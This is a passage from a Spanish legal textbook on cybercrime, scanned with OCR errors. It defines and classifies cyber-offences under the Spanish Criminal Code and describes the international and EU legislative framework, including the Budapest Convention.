no son spam, por ejemplo). Por ello las organizaciones se protegen cada vez
en mayor medida colocando filtros antispam en sus servidores de correo.
El spam en sí no es delictivo, pero para realizarse necesita nutrirse de di-
recciones de correo electrónico, cuya recolección quizás sí se haya realizado
por medios que sean delictivos, como el hacking, el spyware u otros. Por otro
lado, aunque el spam publicitario no es delito, puede haber otro tipo de spam
que sí lo sea, dependiendo de sus fines y contenidos. Así, un spam que con-
tenga malware o que sirva de medio para cometer phishing, o una estafa, etc.,
podría en su caso castigarse como alguno de los tipos penales constitutivos
de cibercrimen, o quizás, al menos, como una tentativa de los mismos.
Otra variante de los correos electrónicos no deseados son los hoaxes (bro-
ma o engaño). Se trata de mensajes de correo electrónico que contienen falsas
advertencias de virus, o cualquier otro tipo de alerta, denuncia, broma, mensa-
je solidario, etc., que se pretende se trasmita en cadena. Su reenvío masivo pue-
de congestionar los servidores de correo. A menudo además quienes lanzan

- 159 -
Cibercriminalidad.
und port . ASPECTOS PENALES y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

estas cadenas tienen la intención de obtener direcciones de correo electrónico


a través de programas spyware, siendo esta segunda actividad sí delictiva.

3.2. Delitos en los que intervienen las TIC que no son cibercrímenes
Para que un comportamiento delictivo pueda ser calificado corno ciber-
crirnen no basta con que en su ejecución hayan intervenido de alguna manera
las tecnologías de la información y la comunicación.
Ej.4.16: María escribe con el programa de Word de su ordenador una ca1ta
injuriosa contra su compañero de trabajo Pedro, después la imprime en la impre-
sora de la empresa y la deja sobre la mesa de Pedro. Aunque en la comisión del
delito haya intervenido un ordenador personal no estamos ante un cibercrimen.

Para que nos encontremos ante un ciberdelito en sentido amplio, el uso


de las TIC tiene que constituir un elemento esencial del delito (MIRó). En esta
obra vamos a defender que tendrá tal consideración la conducta que encaje
en un tipo penal y su modo comisivo consista precisamente en la utilización
de las funciones específicas de las TIC: el almacenamiento, procesamiento y
comunicación de la información. Solo de esta manera se puede decir que el
delito se ha cometido mediante un abuso de las TIC, en tanto las mismas han
favorecido la comisión del delito o modificado de forma relevante sus efectos,
y que, por tanto, la conducta presenta aquellas características problemáticas
que la hacen merecedora de integrarse en la categoría.
Ej. 4.17: Si María a través de su perfil en las redes sociales promueve o incita
directa o indirectamente al odio, hostilidad, discriminación o violencia contra el
grupo de los gitanos, realizando así la conducta tipificada en el art. 510 del Código
penal, sí estaremos ante un ciberdelito en sentido amplio, ya que la comunicación
y difusión del mensaje de incitación al odio, parte esencial del delito, se realiza a
través de las TIC, lo que favorece su comisión y multiplica sus efectos.

Tampoco el hecho de que el delito se dirija contra un sistema informáti-


co supone sin más la existencia de un ciberdelito.
Ej. 4.18: Si María, presa de la ira contra Pedro, se acerca a su mesa de tra-
bajo y le destroza su ordenador personal a martillazos, no nos encontramos
ante un ciberdelito, sino frente a un delito ele clafios.

Es preciso, además y en todo caso, que el medio cornisivo sean las TIC, en
el sentido antes expuesto.

- 160 -
Capitulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICA IÓN YMARCO LEGISLATIVO

Ej. 4.19: Si María envía a través del correo electrónico un troyano a Pedro
que disfrazado de juego divertido ejecuta al descargarse un malware que borra
todos los archivos del ordenador de Pedro, Maria ha cometido un ciberdelito.

III. CLASIFICACIÓN DE LOS CIBERCRÍMENES

l. Por el bien jurídico

La misma clasificación que hemos mencionado en el epígrafe anterior


nos sirve para distinguir los ciberdelitos en función del bien jurídico prote-
gido:
a) Los cibercrímenes en sentido estricto vendrían a proteger un nue-
vo bien jurídico que algunos concretan en la seguridad informática, y otros,
siguiendo más literalmente la redacción del Convenio de Budapest en la con-
fidencialidad, la integridad y la disponibilidad (o funcionalidad) de los siste-
mas informáticos.
Se trata de un bien jurídico colectivo antepuesto, es decir, una barrera
que adelanta la protección de otros bienes jurídicos individuales, o incluso,
en este caso, también supraindividuales, pues la protección de los propios
sistemas informáticos, su confidencialidad, su integridad y su funcionalida-
des, viene a adelantar la protección de bienes como la intimidad o el patri-
monio, pero también de otros como la propiedad intelectual, la fe pública, el
libre mercado, la seguridad del Estado y otros muchos intereses públicos, tal
y como pone de manifiesto la Directiva 2013 / 40 /UE del Parlamento Europeo
y del Consejo, de 12 de agosto de 2013, relativa a los ataques contra los siste-
mas de información la seguridad del Estado. Pero a la vez tiene una dimen-
sión positiva, al garantizar las condiciones en las que se pueden desarrollar
esos otros bienes jurídicos en el ámbito de las TIC.
Son ciberdelitos en sentido puro: el hacking o intrusismo informático,
castigado en el artículo 197 bis CP; las múltiples variantes de daños o sabo-
taje informático, como por ejemplo los daños en los sistemas, programas o
información contenida en aquellos, o la obstaculización o interrupción grave
de su funcionamiento producidos por malware o por ataques tipo DoS, o mail
bombers, castigados en los artículos 264 y ss. CP.
Algunos autores, en cambio, mantienen que estos delitos no son otra cosa que
delitos contra el patrimonio (GONZALEZ Rus, 1999). En esta obra no nos adherimos a
tal visión, que entendemos excesivamente reduccionista, en tanto oculta los verda-

- 16 1 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS Tl ,

deros y más importantes intereses que la confidencialidad, la integridad y la funcio-


nalidad de los sistemas informáticos representan.

b) Cibercrimen en sentido amplio.


Como hemos visto, en un sentido amplio el cibercrimen hace referencia
a que la modalidad comisiva del delito consiste en un abuso de las TIC. Ello
permite catalogar como tales a una gran variedad de conductas cuyo ataque
implica a los más variados benes jurídicos.
Así, encontramos ciberdelitos en sentido amplio contra la intimidad y la
propia imagen, la libertad e indemnidad sexual, el estado civil, el patrimonio,
la propiedad intelectual, el mercado y los consumidores, el orden socioeco-
nómico, la fe pública, la paz pública, el orden público, la seguridad del Estado,
etc.
A efectos de sistematizar la explicación, y también de detenernos en
aquellos aspectos verdaderamente novedosos y problemáticos que aporta la
realización del delito abusando de las TIC, vamos a dividirlos en dos grupos:
i. Nuevas tipologías de ataque a viejos bienes jurídicos.
En esta categoría vamos a incluir aquellos comportamientos que cons-
tituyen nuevas modalidades de ataque a bienes jurídicos y que ha sido ne-
cesario tipificar de manera expresa, pues de lo contrario el hecho resultaba
atípico. Es posible que la nueva modalidad delictiva encuentre similitudes
con delitos preexistentes que se podían cometer fuera de las TIC, pero que no
encaje exactamente en la definición:
Ej. 4.20: En el ejemplo 3.3 ilustrábamos esta categoría con el delito de es-
tafa informática del art. 248.2.a), que había sustituido el tradicional elemento
de la estafa "engaño bastante para producir error en otro" por "manipulación
informática o artificio semejante" : "Los que, con ánimo de lucro y valiéndose
de alguna manipulación informática o artificio semejante, consigan una transfe-
rencia no consentida de cualquier activo patrimonial en perjuicio de otro".

O puede que suponga la conducta una nueva forma especialmente peli-


grosa de favorecimiento de un delito preexistente, pero que no estaba previs-
ta en la definición común del delito:
Ej. 4.21 : Otro ejemplo de nueva tipología delictiva que ha sido preciso tipi-
ficar expresamente pues de lo contrario resultaba impune es la conducta reco-
gida en el artículo 270. 2 CP, que castiga a quien, "en la prestación de servicios
de la sociedad de la información, con ánimo de obtener un beneficio económico
directo o indirecto, y en perjuicio de tercero, facilite de modo activo y no neutral

- 162 -
Ca pitulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

y !lln limitarse a un tratamiento meramente técnico , el acceso o la localización


r-11 internet de obras o prestaciones objeto de propiedad intelectual sin la auto-
rlzación de los titulares de los correspond ientes derechos o de sus cesionarios,
1•11particular ofreciendo listados ordenados y clasificados de enlaces a las obras
y contenidos referidos anteriormente, aunque dichos enlaces hubieran sido fa-
rllitados inicialmente por los destinatarios de sus servicios". Las conductas de
1•stc tipo cometidas antes de la entrada en vigor de este artículo se consideraban
Impunes. Recientemente puede citarse la absolución de los administradores de
In página web seriesyonkis.com, que contenía los enlaces a series de televisión
publicadas sin permiso de los titulares de los derechos (sentencia del Juzgado
de lo Penal número 4 de Murcia, de 21 de julio de 2019~. La absolución se fun-
damenta en que los propietarios de estas páginas web no comunicaban ellos
mismos las obras protegidas (no realizaban el entonces vigente art. 270) sino
que se limitaban a la publicación de los enlaces que conducían a otros servido-
res donde se alojaban las obras. Con la nueva regulación este tipo de actividades
pasan a ser delictivas cuando se cometen con ánimo de obtener un beneficio
económico directo o indirecto. El beneficio económico indirecto se consigue por
lo general insertando public idad por la que se cobra en I::i página web, siendo el
gancho para que el usuario visualice esa publicidad precisamente los enlaces a
los contenidos pirateados.

O, en ocasiones, las TIC elevan de tal manera la peligrosidad de la con-


ducta que el legislador solo tipifica precisamente dicha modalidad, y no otras
similares, pero infinitamente menos peligrosas que pudieran realizarse sin
dichos métodos:
Ej. 4.22: Así, en el delito de groomig, regulado en el art. 183 ter, que ya
hemos comentado (Ej.4.13), el legislador ha limitado la tipicidad de la conduc-
ta a los hechos cometidos a través de las TIC, conscientes de que son estas las
que permiten el engaño (en su momento hablaremos de que el tipo penal sin
embargo no siempre exige engaño, lo que puede resultar un exceso), que el de-
lincuente adopte una personalidad falsa, se gane poco a poco la confianza del
menor y consiga concertar un encuentro. Sin duda es imaginable que alguien
intente este tipo de conductas dejando por ejemplo notas escritas a la víctima,
pero es dudoso que dicho método tuviera la misma eficacia. Realmente es el
funcionamiento de las redes sociales el que permite el tan efectivo método de
comisión del grooming . Dejar una serie de notas escritas a un menor de 16 años
haciéndose pasar por otro para llegar a concertar un encuentro con fines sexua-
les sería todavía un hecho impune ( materialmente es un hecho preparatorio). al
no estar tipificado en nuestro código penal. Habría que esperar en tal caso a que

4 Un resumen de la sentencia puede leerse en: http://www.poderjudicial.es/c9pj/es/


Pod er-Judicial/Noticias-Judicial es/La-juez-absuelve-a -1os-administrad ores-de--Seri esyon kis-
-de-un-delito -contra-la-propiedad-intelectual (último acceso 10.07.2019)

- 163 -
Cibercriminalidad.
PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

el pederasta intentara al menos el acto sexual para castigarlo por tentativa de


este último delito. En cambio, cuando lo que se utilizan son las TIC el legislador
ha decidido adelantar la intervención penal para castigar este acto preparato-
rio, basándose en la mayor peligrosidad de la conducta.

ii. Nuevas modalidades de realización de viejos tipos penales.


En otras ocasiones las TIC constituyen un medio privilegiado para reali-
zar algunos delitos, pero no es necesario, sin embargo, una nueva legislación
que comprenda sus especificidades, pues la conducta cometida abusando de
ellas es ya perfectamente subsumible en la definición tradicional del delito.
A su vez podemos distinguir en este grupo aquellos supuestos en los que la
conducta cometida a través de las TIC se subsume sin más en la misma redac-
ción típica que el delito cometido fuera de las TIC y aquellos casos en que, por
el contrario, el legislador, consciente de la mayor peligrosidad de la conducta
o el mayor desvalor del resultado, debido a la multiplicación de sus efectos
por el uso de las TIC, hace una mención especial a este medio, por lo general
para prever una agravación de la pena.
Ej. 4.23: Jordi creó varias páginas web espejo de tiendas muy conocidas
para hacer creer al usuario que en realidad se encontraba en la página autén-
tica. Las páginas espejo son páginas que imitan todas las características de la
página original y que además tienen un nombre de dominio muy similar (lo que
a su vez se consigue mediante el cybersquatting: que consiste en registrar un
determinado nombre de dominio similar a uno legítimo, para posteriormente
traficar con él o hacer uso con fines fraudulentos). En estas páginas falsas anun-
ciaba ofertas de productos electrónicos, principalmente videoconsolas y telé-
fonos móviles. Las personas que encontraban estas ofertas en Internet creían
estar ante la página auténtica y realizaban la compra pagando por transferencia
bancaria en cuentas abiertas por terceros (mulas) pagados por Jordi. Por su-
puesto los productos no existían y nunca eran enviados a los compradores. La
conducta es una estafa subsumible directamente en la definición tradicional de
este delito que contiene el artículo 248 CP.

Ej. 4.24: El artículo 510 CP castiga a quienes públicamente fomenten, pro-


muevan o inciten directa o indirectamente al odio, hostilidad, discriminación
o violencia contra un grupo, una parte del mismo o contra una persona deter-
minada por razón de su pertenencia a aquél, por motivos racistas, antisemitas,
etc. El n. 3. del mimo artículo establece que la pena prevista para este delito se
impondrá en su mitad superior cuando los hechos se hubieran llevado a cabo a
través de un medio de comunicación social, por medio de Internet o mediante el
uso de tecnologías de la información, de modo que aquel se hiciera accesible a
un elevado número de personas.

- 164 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMA RCO LEGISLATIVO

2. Por la intencionalidad

Las motivaciones y finalidades que llevan a alguien a cometer un cibercri-


rnen pueden ser muy variadas, como lo son en cualquier otro delito: el ánimo
de lucro, la lujuria, el poder, la venganza, la aventura y el deseo de probar la
"fruta prohibida" (GRABOSKY, 2000, FURNELL, 2001). Pero podemos clasificar en
principio la cibercriminalidad en torno a cuatro grandes grupos de intenciones:
a) Reto intelectual
Sin duda en el imaginario colectivo ha quedado, gracias al cine de prin-
cipios de los años 80, la idea romántica del hacker que actuaba por mero reto
intelectual. La capacidad de producir un impacto en grandes sistemas puede,
corno un acto de poder, ser gratificante en sí mismo para algunas personas.
Más si se piensa en esa imagen alimentada por la ficción del joven especial-
mente inteligente con problemas de adaptación. Actividades corno entrar en
un sistema altamente protegido implican, además del desafío intelectual, un
elemento de aventura. El solo hecho de que algunas de estas actividades en el
ciberespacio puedan provocar una condena oficial, junto con la dificultad de
ser descubierto, es suficiente para atraer a los desafiantes, rebeldes o incluso
a los curiosos irresistibles que necesitan ponerse a prueba constantemente
(GRABOSKY, 2000).

Sin embargo, la doctrina ya ha señalado hace tiempo que este modelo


cinematográfico del ciberdelíncuente no es de ninguna manera lo habitual
(GALAN MUÑoz, 2006, Mrnó,2013) . En primer lugar, como ya se vio, no se pue-
de identificar ciberdelíncuente con hacker pues los cibercrímenes son muy
variados. Pero incluso los hackers, en la actualidad, aunque puedan sin duda
experimentar esa emoción del reto intelectual, actúan en la mayoría de los
casos por motivaciones mucho menos admirables, como son las que vamos a
comentar a continuación (dejando fuera el hacking blanco o con motivación
ética, del que hablaremos en su momento).
b) Motivación económica
La mayoría de los ciberdelitos tiene una finalidad última de carácter eco-
nómico, es decir, se realizan con la intención de obtener un lucro patrimo-
nial. Las estafas y todas las actividades informáticas diseñadas para cometer-
las, en especial el malware (spyware, keyloggers, stealers ... ) y otros artificios
(phishing, etc.) dirigidos a robar la información de la víctima que permita
luego acceder a su patrimonio, son delitos con finalidad económica. También
lo son los delitos contra la propiedad intelectual, la ciberextorsión cometida a
través de criptovirus u otro malware, etc.

- 165 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

c) Intencionalidad política (especial referencia al ciberhacktivismo)


Otro gran grupo de la criminalidad cibernética es el caracterizado por mo-
tivaciones políticas o ideológicas. Este tipo de criminalidad suele dirigirse contra
Estados o contra organizaciones. En ocasiones son los propios Estados o grupos
patrocinados por ellos quienes lanzan los ataques. Dentro de la delincuencia con
finalidad política se destacan también las redes sociales como medio idóneo para
la propaganda terrorista, el adiestramiento y la captación de miembros.
El término hacktivismo es un acrónimo de hacker y activismo. Se refiere
a la utilización de ataques informáticos como medio de protesta o reivindi-
cación ideológica. Los hacktivistas suelen utilizar ataques DoS, o defacements
(desfiguraciones de webs, penetrar por mecanismos diversos en el sistema
atacado para, por lo general, modificar el archivo index.html, el responsable
de la página principal del dominio, al cual se accede desde Internet, de mane-
ra que se muestre el mensaje que el hacker desea en lugar de la página origi-
nal). Pero pueden también usar métodos más agresivos, como los sabotajes
informáticos o robos de información.
Ej. 4.25: Uno de los grupos que más protagonismo ha alcanzado es Anon-
ymous. En octubre de 2017 este grupo reivindicó los ataques DDoS contra las
páginas web del Tribunal Constitucional español, el Partido Popular, el Minis-
terio de Economía y el de Fomento entre otras, en el marco de una campaña de
ciberataques que denominaron 'Operation Free Catalonia'.

d) Intencionalidad social
Incluiremos en este último grupo todos aquellos comportamientos de-
lictivos en el ciberespacio que destacan por su componente social, aunque
luego pueden tener las más variadas motivaciones, desde el odio, la vengan-
za, los móviles sexuales, etc. Por ejemplo, el grooming, el stalker o ciberacoso,
el ciberbullying, los delitos de odio cometidos a través de la red, etc.

3. Por su relación con el medio informático

En la doctrina estadounidense algunos autores han distinguido entre


"computer focused crimes", que son delitos que surgen con las TIC, de manera
que no podrían existir sin ellas, como, por ejemplo, el hacking o el sabotaje in-
formático y "computer assited crimes" que son delitos cuya existencia precede
a Internet, pero que adquieren una nueva dimensión en el ciberespacio, por
ejemplo, las estafas, el acoso sexual, el discurso de odio y la pornografía (con
variaciones FURNELL, 2001, GoRDON & FoRD, 2006).

- 166 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

En sentido similar en nuestra doctrina, algunos autores distinguen entre


aquellos delitos en los que el uso las TIC es absolutamente necesario, de manera que
la esencia del delito no puede cometerse sin ellas, reservando a estos el calificativo
de ciberdelitos en sentido estricto, y aquellos otros que en cambio pueden cometer-
se también por un medio no informático, que integrarían la categoría de ciberdeli-
tos en sentido amplio (Mrnó, 2013). Esta explicación no nos parece tan adecuada,
pues en muchos casos dependerá de cuanto concretemos la definición del delito y
de cómo identifiquemos la esencia del mismo, conectándolo a su forma de comisión
o las particularidades de su objeto, el que el mismo parezca incluirse en uno u otro
grupo.

IV. MARCO LEGISLATIVO

La expansión transfronteriza de la cibercrirninalidad requiere nuevos


instrumentos internacionales y un grado fiable de cooperación entre Estados,
así corno la colaboración de actores desde una multiplicidad de sectores pú-
blicos y privados (tecnológico, bancario, científico, cultural, político, etc.). El
archirnencionado fenómeno de la globalización y el extraordinario desarrollo
y universalización de las TIC, junto con la libre circulación de ciudadanos y
de mercancías, han favorecido el incremento de la delincuencia transfronte-
riza y de la criminalidad organizada, que ha encontrado en este cosmos un
espacio especialmente favorable, entre otras cuestiones, por el anonimato y
las dificultades que entraña su persecución y enjuiciamiento, como veremos
en el último epígrafe de este capítulo. De hecho, no es algo exclusivo en este
ámbito, se produce también en contextos distintos, donde la criminalidad
transfronteriza es difícilmente controlable, por ejemplo, en materia de medio
ambiente. Además, es difícil mantener un equilibrio entre el derecho sobera-
no de los Estados y el derecho emanado de la UE, pues el Derecho penal ha
dejado de ser una realidad estrictamente nacional, y en los últimos años ha
sido propulsado por el marco cornpetencial del Tratado de Lisboa.
Nos referimos a tres posibles fricciones. En primer lugar, porque la norma pe-
nal de origen europeo, al ser transpuesta, se juzga con el canon de legitimidad que
establecen los derechos fundamentales en la configuración y contenido que poseen
en un sistema nacional concreto; en segundo lugar, la UE puede pretender aplicar
su propio estándar de legitimidad a las normas de transposición (dado que tiene su
catálogo de derechos fundamentales y un Tribunal de Justicia competente para fijar
sus contenidos); en tercer lugar, el conflicto que se puede generar entre los Estados
miembros en el marco de la cooperación judicial impulsada por la UE. A estos tres
factores se une que la armonización ha alterado el significado de uno de los pilares
sobre los que se sustenta el Derecho penal nacional: la conformación de la reserva
de ley penal unida a la noción de soberanía estatal (Drnz-PICAZO y NIETO MARTIN, 2010;
DE LA MATA BARRANCO, 2015).

- 167 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Los Estados, en lo tocante a sus respectivos ordenamientos penales, son


reacios a desprenderse de cierto margen de soberanía y otorgar facultades de
regulación penal a organismos supranacionales, pero la regulación jurídica del
control, limitación y sanción de los riesgos globales generados por el manejo
abusivo de los sistemas y las redes informáticas en el ciberespacio se ve obli-
gada a rebasar las fronteras físicas de los distintos países, ya que solo de esta
manera es posible abarcar el control del riesgo en toda su dimensión.
Ej. 4.26: Existen países que son auténticos "paraísos digitales" por la esca-
sez de control y la deficiencia legislativa -ausencia de legislación o permisividad
de la normativa-. Por ejemplo, en relación con la pornografía infantil, permiten
utilizar páginas web para alojar contenidos que sin duda serían considerados
ilegales en otros países, o son elegidos para iniciar el camino hacia el ciberdelito
-iter criminis-, mientras el resultado se produce en un país lejano. Un informe
de la Conferencia de las Naciones Unidas sobre Comercio y Desarrollo (UNCTAD
por sus siglas en inglés) de 2018 sobre legislación mundial de la cibercrimina-
lidad apunta que 138 países (de los cuales 95 son economías en desarrollo y
en transición) han promulgado legislación al respecto. No obstante, más de 30
países todavía se encuentran sin normativa que aborde el delito cibernético\

Concretamente, la regulación sustantiva de los ciberdelitos ha sido tra-


mitada mediante dos clases principales de instrumentos penales: las leyes
penales especiales, técnica adoptada por ejemplo por Francia, Reino Unido,
Estados Unidos, Holanda, Venezuela o Chile (país pionero en el ámbito ibe-
roamericano), o bien la incorporación de nuevos delitos en el CP, alternativa
elegida por Argentina, México, Portugal, Austria, Italia o España (Alemania
ha optado por una regulación de naturaleza mixta). En consecuencia, en los
Estados que han avanzado en la tipificación de los ciberdelitos, la legislación
procesal también ha sufrido reformas tendentes al reforzamiento de las in-
vestigaciones en el ecosistema digital y a la implantación forzosa de nuevas
medidas tecnológicas de investigación de los delitos.
Ej. 4.27: En España, tras la reforma de la LECrim llevada a cabo en 2015,
contamos con nuevas medidas de investigación tecnológica, que han de conju-
gar el derecho constitucional a la privacidad de los ciudadanos y que obviamen-
te precisan autorización judicial en la mayoría de los supuestos para eludir su
nulidad en un eventual proceso penal. Es innegable que la criminalidad organi-
zada, por las elevadas cifras que rodean a una multiplicidad de negocios, invier-
te en todo tipo de tecnología de última generación que permita sortear la in-
terceptación de conversaciones, mensajes, triangulación de llamadas, ubicación

5 https://unctad.org/en/ Pages/ DTL/STI_and_ICTs/ ICT4D-Legislation/e Com -Cybercri-


me-Laws.aspx

- 168 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

geográfica, operaciones de ingeniería financiera, creación de redes tecnológicas


ocultas, etc. Así, las FFCC de Seguridad del Estado se han visto obligadas a avan -
zar en el uso policial de las nuevas tecnologías, incorporando drones policiales,
redes seguras para comunicaciones críticas como el veterano Sistema de Comu -
nicaciones TETRA (del inglés: Trans European Trunked Radio ), especialmente
cread o para los servicios de emergencia en los años 90 del s . XX por decisión
de la UE. Es capaz ele establecer comunicaciones seguras incluso sin necesidad
de tener una antena operativa cerca, y es utilizado no solo por la policía sino
por municipios, puertos, aeropuertos, eléctricas, petroleras, refinerías, mine-
ras, Fuerzas Armadas, Policía. La Brigada Central de Investigación Tecnológica
(BCIT), encuadrada en la Unidad de Investigación Tecnológica de la Policía Na-
cional es la unidad policial designada para responder a los retos que plantean
las nuevas formas de delincuencia. La Guardia Civil cuenta con el Grupo de deli -
tos telemáticos (GDT) .

l. Marco legislativo internacional

En el ámbito internacional, el marco legislativo actual surgió como instru-


mento impulsor y catalizador de las instancias europeas y nacionales, que han
emprendido su labor legislativa en torno al sinfín de problemas que rodea a las
conductas en el ciberespacio. Aunque nos ocuparemos con mayor detalle del
marco europeo vigente en el siguiente epígrafe, merece la pena destacar aquí
como antecedente que ya en el ámbito de la Comunidad Europea se habían dic-
tado algunas decisiones sobre el tratamiento de datos sensibles y la concreción
de algunas directrices básicas dirigidas a informar a los Estados sobre cómo
deben actuar en materia de tratamiento de datos personales.
La Directiva 96/9 /CE del Parlamento Europeo y del Consejo de 11 de marzo
de 1996, sobre la protección jurídica de las bases de datos, fue promulgada tras la
publicación de una serie consecutiva de recomendaciones que desde 1985 se ocu-
paban de: la aplicación práctica de la Convención Europea de Asistencia Mutua en
Materia Criminal respecto de las órdenes de rogatorias para la interceptación de las
telecomunicaciones; el uso de datos de carácter personal por el sector policial; la
piratería en relación con los derechos de autor; el catálogo de delitos informáticos y
algunas definiciones de delitos de esta naturaleza; la protección de datos persona-
les en el ámbito de los servicios de telecomunicaciones; y los problemas de procedi-
miento penal relacionados con la tecnología informática (ABoso, 2017).

Sin embargo, el mayor logro es atribuible, como veremos a continuación,


al esfuerzo de cooperación que culminó con la redacción y firma del Conve-
nio sobre la Ciberdelincuencia, conocido comúnmente como el Convenio de
Budapest, ciudad en la que se firmó el 23 de noviembre de 2001, patrocinado
por el Consejo de Europa y vigente desde julio de 2004.

- 169 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Hasta la fecha, ha sido ratificado por los 47 Estados miembros del Consejo de
Europa, excepto Rusia, Suecia, Irlanda y San Marino. España lo ratificó el 20 de mayo
de 2010 y entró en vigor el 1 de octubre del mismo año, tras la publicación en el BOE
del Instrumento de ratificación, de 17 de septiembre de 2010.

Uno de los puntos destacables de este instrumento es que permite la


adhesión de Estados no miembros del Consejo de Europa, como ha sucedi-
do con EE.UU., Australia, República Dominicana, Mauritania, Panamá, Filipi-
nas, Costa Rica, Canadá, Japón, Sudáfrica, Israel y recientemente Argentina,
entre otros. Asimismo, otros Estados han adaptado parte de su normativa a
este Convenio, aunque sin adhesión oficial. Terceros países no suscritores del
Convenio como Rusia y China han acogido, como respuesta al aceptable gra-
do de cooperación entre países occidentales, un marco propio representado
por la Organización de Cooperación de Shanghái (OCS) para elaborar polí-
ticas de regulación de la cibercriminalidad, enfocadas sobre todo regional-
mente y frente a los riesgos que suponen para la seguridad nacional de países
como India, Pakistán o Kazajistán (entre otros) los ataques cibernéticos y el
terrorismo (ABoso, 2017).
El Convenio de Budapest, gestado de forma simultánea al transcurso
del tiempo en que la importancia de los conflictos en el ciberespacio era cre-
ciente y cada vez más evidente, declara la necesidad de armonizar la política
penal encaminada a prevenir conductas abusivas o actos dirigidos contra la
confidencialidad, la integridad y disponibilidad de sistemas, redes y datos in-
formáticos, para asegurar un nivel adecuado de protección a la sociedad en
su conjunto. Así, el espíritu del Convenio se centra en conseguir un objetivo
triple frente a la cibercriminalidad: la armonización del Derecho penal mate-
rial; el establecimiento de medidas procesales; y la instauración de un régi-
men de cooperación internacional eficaz y rápido.
Ej. 4.28: La creación de la Red 24/7 (ver capítulo 3, Ej. 3.7) es un expo-
nente del modelo de cooperación enunciado en este Convenio, conformado por
unos principios generales, que incluye mecanismos para la obtención de prue-
bas electrónicas, o facultades para solicitar la ex-tradición de los delincuentes ,
siempre que se trate de delitos mencionados en los arts. 2 a 11, punib les en
ambos Estados y castigados con pena privativa de libertad con una duración de
al menos 1 año, o con una pena más grave [art. 24.l a)] .

También ofrece una clasificación alternativa de los ciberdelitos, dividida


en cuatro apartados y construida en torno a los diferentes bienes jurídicos
expuestos al ataque, que sin embargo no posee mucho predicamento en la
doctrina mayoritaria:

- 170 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATIVO

l. Delitos contra la confidencialidad, la integridad y la disponibilidad


de los datos y sistemas informáticos (arts. 2 a 6):
acceso ilícito a sistemas informáticos; interceptación ilícita de datos informá-
ticos; interferencia en el funcionamiento de un sistema informático; abuso de
dispositivos que faciliten la comisión de delitos.

2. Delitos informáticos (arts. 7 y 8):


falsificación informática mediante la introducción, borrado o supresión de datos
informáticos; fraude informático mediante la introducción, alteración o borrado
de datos informáticos, o la interferencia en sistemas informáticos.

3. Delitos relacionados con el contenido (art. 9):


producción, oferta, difusión, adquisición de contenidos de pornografía infan-
til, por medio de un sistema informático o posesión de dichos contenidos en
un sistema informático o medio de almacenamiento de datos.

4. Delitos relacionados con infracciones de la propiedad intelectual y


derechos afines (art. 10): copia y distribución de programas informáti-
cos o piratería informá tica.

El Convenio, por otra parte, prevé la sanción penal de la participación y


la tentativa en los ciberdelitos (art. 11), establece la responsabilidad de las
personas jurídicas (art. 12), e implanta medidas para la conservación rápida
de aquellos datos informáticos almacenados a efectos de prueba, con la in-
tención de prevenir el riesgo de su modificación o eliminación (art. 16).
Desde la perspectiva internacional de la Organización de las Naciones
Unidas (ONU) , tanto el Manual para la Prevención y Control de Delitos Infor-
máticos de 1994 como el más reciente Programa Global del Cibercrimen de la
Oficina contra la Droga y el Delito (UNOCD) de 2016, son documentos progra-
máticos que adoptan criterios ajustables a la dimensión supranacional de los
ciberdelitos. Por su parte, el Secretario General de la ONU designó un Grupo
de Expertos Gubernamentales sobre seguridad internacional en el ciberes-
pacio (UNGGE), formado por 20 países, que culminó con la elaboración de un
informe en 2015 donde propuso una serie de normas avaladas con posterio-
ridad por el G-20 6 • Igualmente, se han aprobado algunas decisiones auspicia-
das por la Organización para la Seguridad y la Cooperación en Europa (OSCE),
con 57 Estados participantes de Europa, Asia Central y América del Norte,

6 "Report of the Group of Governmental Experts on Developments in the Field of In-


formation and Telecommunications in the Context of International Security", A/70/174. Unit-
ed Nations, General Assembly, Seventieth session 22 July 2025. Disponible en: https://undocs.
org/ A/ 70/ 174

- 171 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

entre las cuales destacarnos la última decisión de su Consejo Ministerial, la


Decisión N.º 5/17, de 8 de diciembre de 2017, relativa al fortalecimiento de
las iniciativas de la OSCE para reducir los riesgos de conflicto dimanantes del
uso de las tecnologías de la información y las comunicaciones 7.
Informe 2015 UNGGE: Recomendación de normas de comportamiento, des-
tacando aspectos de derecho internacional. Este informe se centra en 6 aspectos:
1) Amenazas existentes y emergentes. 2) Normas, reglas y principios para el com-
portamiento responsable de los Estados. 3) Medidas de fomento de la confianza.
4) Cooperación internacional y desarrollo de capacidades. 5) La aplicabilidad del
derecho internacional. 6) Recomendaciones para el trabajo futuro.

2. Marco legislativo de la Unión Europea

Las autoridades europeas han sido conscientes de que el fenómeno de la


globalización ha transformado la criminalidad más grave debido a su interna-
cionalización (delincuencia organizada, terrorismo, apología de la xenofobia
y el racismo, trata de personas, tráfico de armas, drogas tóxicas, estupefacien-
tes y sustancias psicotrópicas, etc.) verificando las carencias e insuficiencias
de las legislaciones penales y procesales internas, así corno de los recursos
judiciales y policiales de los Estados miembros. Desde el inicio, los delitos
contra los sistemas informáticos se incluyeron en la categoría de delitos es-
pecialmente graves con una dimensión transfronteriza, que son los exclusiva-
